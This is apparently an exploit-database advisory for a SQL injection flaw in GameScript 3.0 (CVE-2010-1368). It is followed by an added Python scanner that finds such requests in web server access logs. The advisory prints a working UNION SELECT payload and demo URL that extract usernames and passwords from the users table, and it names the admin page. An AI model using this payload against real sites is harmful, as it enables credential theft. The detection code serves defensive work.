NeoSense

GameScript 3.0 - SQL Injection

Author: FormatXformat
type: webapps
platform: php
date_added: 2010-02-24
verified: 1
codes: OSVDB-63727;CVE-2010-1368

Author :  FormatXformat
Home : Tkurd.net

Script : http://www.gamescript.net
Vulnerabilities : SQL Injection


Dork:

Copyright © 2005 - 2006 GameScript.net. All Games Copyright © To Their Respective Owners. All Rights Reserved.



Exploit:

/index.php?action=category&id=-6+union+all+select+1,concat(username,0x3a,password),3+from+users--

Admin page: admincp



Demo :

http://server/index.php?action=category&id=-6+union+all+select+1,concat(username,0x3a,password),3+from+users--
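
Added example (not part of the original advisory): a log check for finding requests like the one above in web server access logs. It assumes combined-format logs and that legitimate category ids are plain non-negative integers; the sample log lines, including the action=play request, are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (documentation IP ranges), not from a real server.
SAMPLE_LOG = [
    '203.0.113.5 - - [24/Feb/2010:10:01:02 +0000] "GET /index.php?action=category&id=6 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [24/Feb/2010:10:02:10 +0000] "GET /index.php?action=category'
    '&id=-6+union+all+select+1,concat(username,0x3a,password),3+from+users-- HTTP/1.1" 200 734',
    '203.0.113.9 - - [24/Feb/2010:10:02:40 +0000] "GET /index.php?action=category'
    '&id=-6%20UNION%20ALL%20SELECT%201,2,3-- HTTP/1.1" 200 701',
    '198.51.100.7 - - [24/Feb/2010:10:03:00 +0000] "GET /index.php?action=category&id=6%27 HTTP/1.1" 200 688',
    '198.51.100.7 - - [24/Feb/2010:10:03:30 +0000] "GET /index.php?action=play&id=12 HTTP/1.1" 200 9000',
]

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
UNION_SELECT = re.compile(r'\bunion\b.+\bselect\b', re.IGNORECASE | re.DOTALL)
INTEGER_ID = re.compile(r'[0-9]+')  # assumption: real category ids look like this


def scan(lines):
    """Return (client, reason, decoded id) for suspicious category requests."""
    findings = []
    for line in lines:
        match = REQUEST.match(line)
        if not match:
            continue  # not a request line we understand
        client, uri = match.groups()
        url = urlsplit(uri)
        if not url.path.endswith('/index.php'):
            continue
        # parse_qs undoes both "+" and %XX encoding, so variants compare equal.
        query = parse_qs(url.query, keep_blank_values=True)
        if query.get('action') != ['category']:
            continue
        for value in query.get('id', []):
            if INTEGER_ID.fullmatch(value):
                continue
            reason = 'union-select' if UNION_SELECT.search(value) else 'non-integer id'
            findings.append((client, reason, value))
    return findings


if __name__ == '__main__':
    for client, reason, value in scan(SAMPLE_LOG):
        print(f'{client}\t{reason}\t{value!r}')
```

The same integer-only rule, enforced in the application before the id value reaches the query, is the corresponding fix.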